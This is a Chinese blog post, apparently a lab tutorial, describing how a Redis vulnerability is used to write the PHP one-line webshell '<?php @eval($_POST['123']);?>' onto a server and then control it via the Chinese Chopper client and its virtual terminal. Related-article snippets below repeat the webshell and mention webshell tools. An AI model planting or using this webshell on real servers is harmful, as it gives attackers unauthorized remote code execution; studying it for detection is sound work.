Web — webshell

最新推荐文章于 2023-05-18 12:55:30 发布
最新推荐文章于 2023-05-18 12:55:30 发布
阅读量154 收藏
点赞数
分类专栏: web 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45492773/article/details/100763562
版权

环境需求:php服务、redis服务、apache服务开启
浏览器访问:服务器IP/index.php
在这里插入图片描述
利用redis漏洞
进入redis交互模式
输入一句话木马

<?php @eval($_POST['123']);?>

在这里插入图片描述

浏览器访问:服务器IP/qwe.php
在这里插入图片描述
在windows端 使用“中国菜刀”

地址后面的小框填写输入的密码
在这里插入图片描述
在这里插入图片描述
点击进入,发现已经获得虚拟机权限
在这里插入图片描述
右键添加的那一网址,点击“虚拟终端”,可以在内输入命令

在这里插入图片描述
在虚拟机用tcpdump命令抓流量包,然后进行分析
在这里插入图片描述

-Yanug-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Webshell上传方式
悦分享
07-31 3831
某天公司的网络运维人员发现公司的业务系统遭到了攻击,被挂了木马,导致公司数据泄露,并且黑客留下了后门。Webshell,顾名思义web指的是在web服务器上,而shell是用脚本语言编写的脚本程序Webshell就是就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门。............
WebShell -- 开启3389服务
weixin_41489908的博客
03-15 954
世间最好的默契,并非是有人懂你说出的故事,而是有人懂你说不出的心事。。。 ​---- 网易云热评 一、查询远程连接的端口 1、命令查询,win7/win10/win2003都可以使用 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0xd3d转换十进制是3389 2、注册表查询 二、开启3389端口的方法 1、工具开启 ..
强大无比的Webshell扫描器
wolf7758521的专栏
07-20 828
<br />能用强大、漂亮、NB三个词来形容,支持扫描几乎所有的Webshell(网页木马)。<br />扫描完了还可以给一个表报,扫描速度也是快的没法说,扫10000个文件的目录只要2s钟。。。。。<br /> <br />原下载地址:http://www.yxlink.com/html/zhichiyuxiazai/ruanjianxiazai/2009/0904/146.html
网络安全-webshell详解(原理、攻击、检测与防御)
热门推荐
关注网络安全、云原生安全
09-14 6万+
简介 原理 攻击 WebShell管理工具 Cknife中国菜刀 antSword中国蚁剑 冰蝎动态二进制加密网站管理客户端 weevely3Weaponized web shell Altmanthe cross platform webshell tool in .NET Webshell SniperManage your website via terminal quasibotcomplex webshell manager, quasi-http botne...
Webshell管理工具
weixin_59872639的博客
01-15 1万+
中国蚁剑 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。 中国蚁剑的核心功能 Shell代理功能 Shell管理 文件管理 虚拟终端 数据库管理 插件市场 插件开发 中国蚁剑的简单使用 环境需求 windows攻击机,装有蚁剑 windows靶机,有phpstudy环境 步骤1:写一个简单的一句话木马 <?php @eval($_POST['123456'])
Webshell是什么
huangmingzhong的专栏
09-22 2828
webshellweb入侵的脚本攻击工具。简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。 为了更好理解webshell我们学习两个概念:
XCTF WEB webshell
无限迭代中......
06-30 1702
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 题解:修改HTML代码提交一个shell的变量 变量值是webshell命令 ​​​​​​​<form action="http://111.198.29.45:36317/index.php" meth...
ctfshow菜狗 web webshell
hypocrite2的博客
05-18 470
Webshell是一种恶意脚本,可以上传到Web服务器上,以获取未经授权的访问和对服务器的控制。如果通过GET请求传递了名为 cmd 的参数,代码将尝试对参数进行反序列化,并调用 $unserializecmd->init() 方法。否则,代码将显示自身的源代码。如果条件为真,则调用 exec() 方法,传递 $cmd 的值。了解到它的格式,字母O,8位,“Webshell”,1,s,3位,cmd,s,位数,“真正想执行的命令”__construct() 方法是类的构造函数,它调用 init() 方法。
攻防世界 web webshell
Kni9hT's Blog
03-01 3382
做题两分钟,工具两小时 题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 所谓的php一句话:<?php @eval($_POST['shell']);?> 这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算 这题又涉及到新的web工具,Cknife (因为现在网络上菜刀的后...
WebShell 路人甲WEB管理 v1.3
11-10
路人甲WEB管理具有WebShell批量检测、批量执行命令、批量查询百度权重,百度收录,正确率可达百分之九十八,是一款不可多得的必备神器。路人甲WEB管理功能介绍:打开软件后将存有
caidao.rar_caidao web_webshell_入侵检测系统
09-15
web系统管理工具,用于入侵检测,中国开发者使用。
java 简单的webshell_一个简单的webshell
weixin_35430535的博客
02-26 702
Thanks for your support "};String[] strFileManage={"文 件 管 理","File Management"};String[] strCommand={"CMD 命 令","Command Window"};String[] strSysProperty={"系 统 属 性","System Property"};String[] strHelp...
Spug开源运维平台2.3版本新增主机批量导入,自定义密钥等功能
qq_38472635的博客
07-07 1032
Spug是一个轻量自动化运维平台Spug 特性:开源免费,简单好用,不需要安装Agent,功能包含主机管理、主机批量执行、主机在线终端、文件在线上传下载、应用发布部署、在线任务计划、配置中心、进程端口站点监控、微信钉钉邮件报警等一系列功能。 开源链接: https://github.com/openspug/spug 近期Spug发布了一些新功能,也对一些功能进行了优化改进。下面是具体的更新内容: 主机批量导入 这个功能已经很多同学向我们反馈了,这次终于更新了。下...
腾讯云在线WebShell终端使用体验
weixin_54652750的博客
08-05 913
WebShell最近更新的很快,之前都是每更新一次就新开一篇文章并引用前一篇文章的链接,后面考虑到更新如此频繁影响到小伙伴们的阅读体验,故开一篇新的合集,此后每次更新都会在这里修改并打上修改日期~...
餐厅点餐系统springboot.zip
09-10
开发一个基于Spring Boot的餐厅点餐系统可以大大提高餐厅的服务效率和顾客体验。下面是一个简单的案例程序,展示了如何使用Spring Boot来构建这样一个系统。这个系统将包括用户管理、菜单管理、订单管理等基本功能。 1. 创建项目 首先,通过Spring Initializr(https://start.spring.io/)创建一个新的Spring Boot项目,并添加必要的依赖项,如Web、Thymeleaf、Spring Data JPA 和 MySQL Driver。
MATLAB_SIMULINK中的病毒传播模拟器.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
Sigrity-Sigrity MCP Specification.rar
最新发布
09-10
Sigrity-Sigrity MCP Specification.rar 当引脚名称映射失败时,通过坐标映射为替代引脚映射方法添加可选的引脚坐标(相对于元件原点)。 本文档描述了信号模型连接协议(MCP)。 MCP用于在管芯(芯片)、封装和PCB之间连接电路模型和/或物理布局。 MCP允许任何MCP型号的Sigrity产品内的自动模型和结构连接。 它还允许第三方工具将Sigrity模型与MCP集成或连接。 MCP使用简单的ASCII格式,支持模型连接的多个电路和引脚,并允许将物理引脚集中在电路模型中。 MCP具有可扩展性和向后兼容性。
智能优化算法-樽海鞘优化算法(SSA)
09-10
樽海鞘优化算法 (Salp Swarm Algorithm, SSA) 虽然名称中提到的是“樽海鞘”,但实际上这个算法是基于群体智能的一种元启发式优化算法,它模拟了樽海鞘(Salps)在海洋中的游动和觅食行为,用于解决复杂的优化问题。 SSA的工作机制主要包括以下几个方面: 链式游动:模拟樽海鞘在海洋中形成链状结构进行集体游动,用于探索解空间。 觅食行为:通过模拟樽海鞘的觅食行为,促进算法的局部搜索能力。 动态调整:根据当前搜索状态动态调整搜索策略,平衡全局搜索和局部搜索。 优点包括: 强大的探索能力:SSA能够有效地探索解空间的不同区域。 灵活性:适用于多种优化问题,包括连续和离散优化。 快速收敛:通常能够在较少迭代次数内找到较好的解。 易于实现:算法设计直观,易于编程实现。
CNG油改气 150+155+2.0+调试软件
09-10
CNG油改气 150+155+2.0+调试软件
WebShell详解:基础与防范策略
WebShell是一种特殊的软件工具,它使得未经授权的用户能够通过Web应用程序对服务器进行某种程度的操作。在Web渗透的基础知识中,WebShell的重要性不言而喻,特别是在当前网络环境日益复杂,企业、政府和学校等机构...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值